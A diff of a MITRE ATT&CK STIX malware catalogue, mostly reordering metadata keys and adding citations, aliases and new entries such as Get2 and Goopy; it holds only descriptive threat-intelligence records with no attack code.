"created": "2017-05-31T21:32:18.668Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ],
"x_mitre_aliases": [
"Derusbi",
"PHOTO"
],
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e170995d-4f61-4f17-b60e-04f9a06ee517",
@@ -192798,16 +221521,16 @@
],
"modified": "2020-03-30T15:30:14.126Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Dipsind"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ryan Becwar"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "Dipsind"
+ ],
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -192843,14 +221566,14 @@
],
"modified": "2020-03-19T19:08:28.695Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Dok",
"Retefe"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
@@ -192882,13 +221605,13 @@
],
"modified": "2020-03-30T15:31:30.330Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DownPaper"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--08d20cd2-f084-45ee-8558-fa6ef5a18519",
@@ -192916,14 +221639,14 @@
],
"modified": "2020-03-30T15:32:15.795Z",
"created": "2017-05-31T21:33:16.790Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Downdelph",
"Delphacy"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -192960,16 +221683,22 @@
],
"modified": "2020-03-30T16:20:01.787Z",
"created": "2019-05-30T19:47:37.192Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Dridex",
"Bugat v5"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:32:31.188Z",
+ "modified": "2020-03-30T02:07:19.052Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -192989,25 +221718,19 @@
"name": "Duqu",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--68dca94f-c11d-421e-9287-7c501108e18c",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T02:07:19.052Z",
- "created": "2017-05-31T21:32:31.188Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Duqu"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "DustySky",
- "description": "[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)",
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)",
"external_references": [
{
"external_id": "S0062",
@@ -193015,14 +221738,18 @@
"source_name": "mitre-attack"
},
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
"url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
"description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.",
"source_name": "DustySky2"
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
"object_marking_refs": [
@@ -193032,22 +221759,22 @@
"labels": [
"malware"
],
- "modified": "2020-03-23T22:01:45.880Z",
+ "modified": "2020-05-14T15:14:33.332Z",
"created": "2017-05-31T21:32:41.750Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DustySky",
"NeD Worm"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Dyre",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) is a Trojan that has been used for financial gain. \n (Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. \n (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -193058,10 +221785,28 @@
"source_name": "Dyre",
"description": "(Citation: Symantec Dyre June 2015)"
},
+ {
+ "source_name": "Dyzap",
+ "description": "(Citation: Sophos Dyreza April 2015)"
+ },
+ {
+ "source_name": "Dyreza",
+ "description": "(Citation: Sophos Dyreza April 2015)"
+ },
{
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Sophos Dyreza April 2015",
+ "url": "https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/",
+ "description": "Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020."
}
],
"object_marking_refs": [
@@ -193071,15 +221816,20 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:20:52.891Z",
+ "modified": "2020-06-22T17:59:13.241Z",
"created": "2017-05-31T21:32:19.746Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "Dyre"
+ "x_mitre_contributors": [
+ "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty"
],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Dyre",
+ "Dyzap",
+ "Dyreza"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c",
@@ -193107,13 +221857,13 @@
],
"modified": "2020-03-30T16:21:32.420Z",
"created": "2017-05-31T21:32:43.237Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ELMER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51",
@@ -193150,15 +221900,15 @@
],
"modified": "2020-03-28T00:54:00.807Z",
"created": "2019-04-19T16:40:24.922Z",
- "x_mitre_contributors": [
- "Marc-Etienne M.L\u00e9veill\u00e9, ESET"
+ "x_mitre_platforms": [
+ "Linux"
],
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Ebury"
],
- "x_mitre_platforms": [
- "Linux"
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Marc-Etienne M.L\u00e9veill\u00e9, ESET"
]
},
{
@@ -193204,15 +221954,15 @@
],
"modified": "2020-03-20T23:20:16.933Z",
"created": "2017-05-31T21:32:54.416Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Elise",
"BKDR_ESILE",
"Page"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1",
@@ -193244,13 +221994,13 @@
],
"modified": "2020-03-20T17:06:41.399Z",
"created": "2017-05-31T21:32:54.772Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Emissary"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -193344,18 +222094,18 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T19:29:55.998Z",
+ "modified": "2020-07-15T13:03:45.812Z",
"created": "2019-03-25T18:35:14.353Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Omkar Gudhate"
],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Emotet",
"Geodo"
],
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Omkar Gudhate"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -193404,9 +222154,10 @@
],
"modified": "2020-03-30T02:09:54.540Z",
"created": "2017-05-31T21:32:58.738Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Martin Smolar, ESET"
],
+ "x_mitre_version": "1.3",
"x_mitre_aliases": [
"Epic",
"Tavdig",
@@ -193414,9 +222165,8 @@
"WorldCupSec",
"TadjMakhal"
],
- "x_mitre_version": "1.3",
- "x_mitre_contributors": [
- "Martin Smolar, ESET"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -193449,15 +222199,15 @@
],
"modified": "2020-03-30T16:22:06.314Z",
"created": "2019-06-28T17:40:32.217Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "ESET"
],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"EvilBunny"
],
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "ESET"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -193486,13 +222236,13 @@
],
"modified": "2020-03-30T16:22:54.155Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"EvilGrab"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--11194d8b-fdce-45d2-8047-df15bb8f16bd",
@@ -193524,15 +222274,28 @@
],
"modified": "2020-03-20T17:08:21.639Z",
"created": "2019-08-26T13:02:46.378Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Exaramel for Linux"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-01-30T15:10:03.894Z",
+ "modified": "2020-06-17T23:21:44.445Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
+ "name": "Exaramel for Windows",
+ "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0343",
@@ -193549,19 +222312,6 @@
"description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)",
- "name": "Exaramel for Windows",
- "id": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T02:10:54.652Z",
- "created": "2019-01-30T15:10:03.894Z",
"x_mitre_platforms": [
"Windows"
],
@@ -193600,13 +222350,13 @@
],
"modified": "2020-03-27T20:45:20.126Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"FALLCHILL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -193647,14 +222397,14 @@
],
"modified": "2020-03-30T16:23:47.799Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"FELIXROOT",
"GreyEnergy mini"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--43213480-78f7-4fb3-976f-d48f5f6a4c2a",
@@ -193682,13 +222432,13 @@
],
"modified": "2020-03-30T02:54:51.882Z",
"created": "2017-05-31T21:32:28.754Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"FLASHFLOOD"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -193720,15 +222470,21 @@
],
"modified": "2020-03-30T16:24:24.753Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FLIPSIDE"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:32:52.470Z",
+ "modified": "2020-03-27T20:41:21.473Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -193748,19 +222504,13 @@
"name": "FakeM",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--bb3c1098-d654-4620-bf40-694386d28921",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-27T20:41:21.473Z",
- "created": "2017-05-31T21:32:52.470Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FakeM"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1",
@@ -193797,15 +222547,21 @@
],
"modified": "2020-03-30T18:52:30.568Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Felismus"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2018-01-16T16:13:52.465Z",
+ "modified": "2020-03-30T15:32:08.360Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "FinFisher",
@@ -193853,21 +222609,15 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows",
+ "Android"
],
- "modified": "2020-03-30T15:32:08.360Z",
- "created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.3",
"x_mitre_aliases": [
"FinFisher",
"FinSpy"
],
- "x_mitre_platforms": [
- "Windows",
- "Android"
- ]
+ "x_mitre_version": "1.3"
},
{
"external_references": [
@@ -193899,13 +222649,13 @@
],
"modified": "2020-03-30T16:41:11.166Z",
"created": "2019-01-31T00:23:06.022Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Final1stspy"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -193955,15 +222705,15 @@
],
"modified": "2020-03-30T16:41:41.805Z",
"created": "2017-05-31T21:33:21.973Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Flame",
"Flamer",
"sKyWIper"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -193991,13 +222741,13 @@
],
"modified": "2020-03-20T23:52:23.647Z",
"created": "2019-05-28T19:07:29.816Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FlawedAmmyy"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -194025,13 +222775,13 @@
],
"modified": "2019-06-07T18:47:42.365Z",
"created": "2019-05-29T14:33:04.253Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"FlawedGrace"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -194063,13 +222813,13 @@
],
"modified": "2020-03-30T16:42:09.499Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FruitFly"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--50d6688b-0985-4f3d-8cbe-0c796b30703b",
@@ -194097,13 +222847,13 @@
],
"modified": "2020-03-20T18:11:27.347Z",
"created": "2019-09-12T17:40:38.303Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Fysbis"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2",
@@ -194131,14 +222881,14 @@
],
"modified": "2020-03-30T16:42:52.248Z",
"created": "2017-05-31T21:32:20.526Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"GLOOXMAIL",
"Trojan.GTALK"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -194164,15 +222914,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-18T20:13:45.707Z",
+ "modified": "2020-06-23T19:20:45.892Z",
"created": "2019-10-11T17:29:20.165Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"GRIFFON"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--76abb3ef-dafd-4762-97cb-a35379429db4",
@@ -194213,17 +222963,17 @@
],
"modified": "2020-03-28T21:34:33.810Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Gazer",
- "WhiteBear"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Bartosz Jerzman"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "Gazer",
+ "WhiteBear"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--199463de-d9be-46d6-bb41-07234c1dd5a6",
@@ -194251,10 +223001,44 @@
],
"modified": "2020-03-30T16:43:20.186Z",
"created": "2017-05-31T21:32:36.177Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"GeminiDuke"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0460",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0460"
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)",
+ "name": "Get2",
+ "id": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T16:48:16.541Z",
+ "created": "2020-05-29T20:32:42.686Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Get2"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -194275,7 +223059,7 @@
"description": "(Citation: McAfee Gold Dragon)"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
"source_name": "McAfee Gold Dragon"
}
@@ -194287,15 +223071,49 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T02:55:38.869Z",
+ "modified": "2020-04-21T23:09:31.063Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Gold Dragon"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)",
+ "name": "Goopy",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0477",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0477"
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-29T21:37:55.776Z",
+ "created": "2020-06-19T20:42:19.258Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Goopy"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--1d1fce2f-0db5-402b-9843-4278a0694637",
@@ -194327,13 +223145,13 @@
],
"modified": "2020-03-30T20:44:34.524Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"GravityRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -194365,13 +223183,13 @@
],
"modified": "2020-03-30T16:44:35.685Z",
"created": "2019-01-30T13:53:14.264Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"GreyEnergy"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--f8dfbc54-b070-4224-b560-79aaa5f835bd",
@@ -194399,13 +223217,13 @@
],
"modified": "2020-03-30T16:45:07.782Z",
"created": "2017-05-31T21:33:15.910Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"H1N1"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
@@ -194472,15 +223290,15 @@
],
"modified": "2020-03-30T16:45:38.272Z",
"created": "2017-05-31T21:32:29.203Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HAMMERTOSS",
"HammerDuke",
"NetDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
@@ -194550,13 +223368,13 @@
],
"modified": "2020-03-30T19:45:04.248Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HARDRAIN"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -194588,13 +223406,13 @@
],
"modified": "2020-03-30T16:46:39.617Z",
"created": "2019-06-20T14:52:45.057Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"HAWKBALL"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b",
@@ -194622,14 +223440,14 @@
],
"modified": "2019-04-25T02:33:53.419Z",
"created": "2017-05-31T21:32:40.801Z",
- "x_mitre_version": "1.0",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HDoor",
"Custom HDoor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "malware--e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4",
@@ -194662,13 +223480,13 @@
],
"modified": "2020-03-30T16:47:08.223Z",
"created": "2017-05-31T21:33:17.272Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HIDEDRV"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--7451bcf9-e6e6-4a70-bc3d-1599173d0035",
@@ -194700,13 +223518,13 @@
],
"modified": "2020-03-30T16:47:38.393Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HOMEFRY"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--454fe82d-6fd2-4ac6-91ab-28a33fe01369",
@@ -194738,13 +223556,13 @@
],
"modified": "2020-03-30T19:47:21.986Z",
"created": "2019-04-19T15:30:36.593Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HOPLIGHT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360",
@@ -194786,15 +223604,15 @@
],
"modified": "2020-03-20T02:22:13.185Z",
"created": "2017-05-31T21:32:46.445Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HTTPBrowser",
"Token Control",
"HttpDump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4b62ab58-c23b-4704-9c15-edd568cd59f8",
